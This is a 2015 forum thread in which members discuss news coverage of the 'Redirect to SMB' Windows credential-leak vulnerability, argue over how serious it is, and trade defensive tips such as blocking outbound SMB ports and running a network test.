85160670 (banned)"If U know neither the enemy nor yoursel join:2013-09-17 Edmonton, AB
4 recommendations |
85160670 (banned)
Member
2015-Apr-13 11:29 am
New Security Flaw Spans All Versions Of WindowsHuh..."Newly found 'forever-day' vulnerability affects 31 popular software programs including applications from Adobe, Apple, Microsoft, Symantec -- and Windows 10 preview. A security flaw discovered affecting all versions of Windows as well as some 31 software vendors' products including Adobe, Apple, Oracle, and Symantec, was disclosed publicly today. The so-called "Re-Direct To SMB" vulnerability, found by Cylance SPEAR team researcher Brian Wallace, lets an attacker siphon the encrypted login credentials from Windows PC users. An attacker could do so either via a compromised web server or by wresting control of network traffic and redirecting it to a malicious SMB-based server, where the Windows' users credentials then would be stolen. The attacker then could crack the credentials in a matter of hours, according to Cylance, and use them to steal data, control the PC, or launch attacks on other parts of the victim machine's network.'..[ » www.darkreading.com/endp ··· 1319884? ] |
|
Kilroy MVM join:2002-11-21 Saint Paul, MN
1 recommendation |
Kilroy
MVM
2015-Apr-13 1:43 pm
Another one of those "sounds worse than it really is" types of issues. quote: HD Moore, chief research officer at Rapid7 and creator of Metasploit, says the attack puts Windows clients at risk on untrusted or compromised networks.
If you're on your own network your risk is greatly reduced and if your network is already compromised this isn't going to make it much worse. said by Microsoft : "Several factors would need to converge for a 'man-in-the-middle' cyberattack to occur," a Microsoft spokesperson said.
If you're already the subject of a man-in-the-middle attack this is the least of your worries. quote: Apple's Software Updater for iTunes, for instance, is vulnerable to this attack via MITM. An attacker would have to have compromised the DNS record of Apple and redirect update requests to a malicious SMB server.
Again if your DNS has been compromised this is the least of your worries. |
|
1 recommendation |
to 85160670
More at Kaspersky ThreatPost: » threatpost.com/new-smb-f ··· -windowsquote: The vulnerability, disclosed Monday by researchers at Cylance, is an extension of research done by Aaron Spangler nearly 20 years ago, and its known as Redirect to SMB. This weakness can enable an attacker to force victims to try to authenticate to an attacker-controlled server.
Redirect to SMB is a way for attackers to steal valuable user credentials by hijacking communications with legitimate web servers via man-in-the-middle attacks, then sending them to malicious SMB (server message block) servers that force them to spit out the victims username, domain and hashed password, a blog post by Brian Wallace from Cylance says.
|
|
|
chachazz |
to 85160670
Cert Vulnerability Note VU#672268 Microsoft Windows NTLM automatically authenticates via SMB when following a file:// URL » www.kb.cert.org/vuls/id/672268 |
|
CartelIntel inside Your sensitive data outside Premium Member join:2006-09-13 Chilliwack, BC 1 edit
1 recommendation |
Cartel
Premium Member
2015-Apr-13 3:09 pm
Block outbound SMB
Consider blocking outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN.139 and 445 are permanently blocked for years here.. |
|
19579823 (banned)An Awesome Dude join:2003-08-04 |
to 85160670
This only has the chance of working if you have a network setup..... I do not and when i try to goto ANY FILE:// with an OUTSIDE LOCATION I get this |
|
19579823 |
19579823 (banned)
Member
2015-Apr-13 3:15 pm
|
|
Kilroy MVM join:2002-11-21 Saint Paul, MN
2 recommendations |
to Cartel
Re: New Security Flaw Spans All Versions Of WindowsI want to say that port 139 has been blocked by ISPs since the mid 90s. Both are blocked in Comcast's blocked ports. Again, it sounds bad until you check into it. If someone is on your network exploiting this you have bigger issues. |
|
CartelIntel inside Your sensitive data outside Premium Member join:2006-09-13 Chilliwack, BC
1 recommendation |
Cartel
Premium Member
2015-Apr-13 3:30 pm
Not this ISP... [INFO] Mon Apr 13 12:28:55 2015 Blocked incoming TCP connection request from 4.79.142.206:42124 to 70.78.71.11:139 [INFO] Mon Apr 13 12:28:55 2015 Blocked incoming TCP connection request from 4.79.142.206:42124 to 70.78.71.11:138 [INFO] Mon Apr 13 12:28:55 2015 Blocked incoming TCP connection request from 4.79.142.206:42124 to 70.78.71.11:137 [INFO] Mon Apr 13 12:28:55 2015 Blocked incoming TCP connection request from 4.79.142.206:42124 to 70.78.71.11:136 [INFO] Mon Apr 13 12:28:55 2015 Blocked incoming TCP connection request from 4.79.142.206:42124 to 70.78.71.11:135 |
|
19579823 (banned)An Awesome Dude join:2003-08-04
1 recommendation |
to Kilroy
Yup 139 is blocked in my firewall as well as 137 and 138 |
|
85160670 (banned)"If U know neither the enemy nor yoursel join:2013-09-17 Edmonton, AB |
to Cartel
{{{ GRIN }}} ..... nice, Cartel *_^ |
|
1 recommendation |
to Kilroy
said by Kilroy:Another one of those "sounds worse than it really is" types of issues.
If you're on your own network your risk is greatly reduced and if your network is already compromised this isn't going to make it much worse. said by Microsoft : "Several factors would need to converge for a 'man-in-the-middle' cyberattack to occur," a Microsoft spokesperson said.
If you're already the subject of a man-in-the-middle attack this is the least of your worries. Again if your DNS has been compromised this is the least of your worries. Lets assume my network is compromised and my DNS is compromised and unspecified creatures have their hearts set on conducting middle-man attacks. Under these conditions is it in any way unrealistic to expect while attempting to connect to systems having not been compromised my password remain safe? Or once I have connected contents of data are not leaked or modified in transit? Is this technically infeasible or unrealistic? Given perimeter defense is a fantasy and most costly attacks are "inside jobs" yes all very old news yet I would suggest the situation is still very serious. |
|
siljalineI'm lovin' that double wide Premium Member join:2002-10-12 Montreal, QC |
to 85160670
See also - Windows security flaw could lead to login theft, researchers claim » www.zdnet.com/article/sm ··· windows/» twitter.com/ZDNet/status ··· 01778946 |
|
NetFixerFrom My Cold Dead Hands Premium Member join:2004-06-24 The Boro Netgear CM500 Pace 5268AC TRENDnet TEW-829DRU
1 recommendation |
to 85160670
Anyone who wishes to see if they are vulnerable to this from an Internet connection (and who are not afraid to install/enable Java) can run the ICSI Netalyzer test and find out. The test will check both IPv4 and IPv6 connections for the vulnerability (if outbound NBT and SMB ports are blocked, you are not vulnerable to an Internet attack). Here are examples of a PC that is not vulnerable to an Internet attack using this vulnerability: IPv4 test results
IPv6 test results
|
|
Mele20 Premium Member join:2001-06-05 Hilo, HI 1 edit
1 recommendation |
Mele20
Premium Member
2015-Apr-14 8:58 am
Thanks for reminding me about ICSI Netalyzer. It's been maybe 4-5 months since I ran it last. Evidently my sleazebag ISP doesn't understand the word NO, I OPT OUT because the fuckers have turned back on wild carding of DNS addresses that don't exist thus arrogantly breaking the internet and taking me to a crap site full of ads if I happen to mistype a url in the address bar. I said NO to those m**fuckers some time ago yet evidently "no" in their pathetic little minds is "no" until they decide it is "yes" and then they proceed to rape me never even having the common decency to tell me that NO means YES whenever they wish. I don't have a router that runs third party software where I could easily fix this (the Netgear runs SamKnows firmware) and I don't like using other DNS servers because Oceanic's are located on Oahu and any others are way off on the Mainland thus slowing things down. |
|
sivranVive Vivaldi Premium Member join:2003-09-15 Irving, TX 1 edit
1 recommendation |
to 85160670
Windows 8 (and possibly all the way down to Vista) has a built-in firewall rule to limit outbound SMB to the local subnet. |
|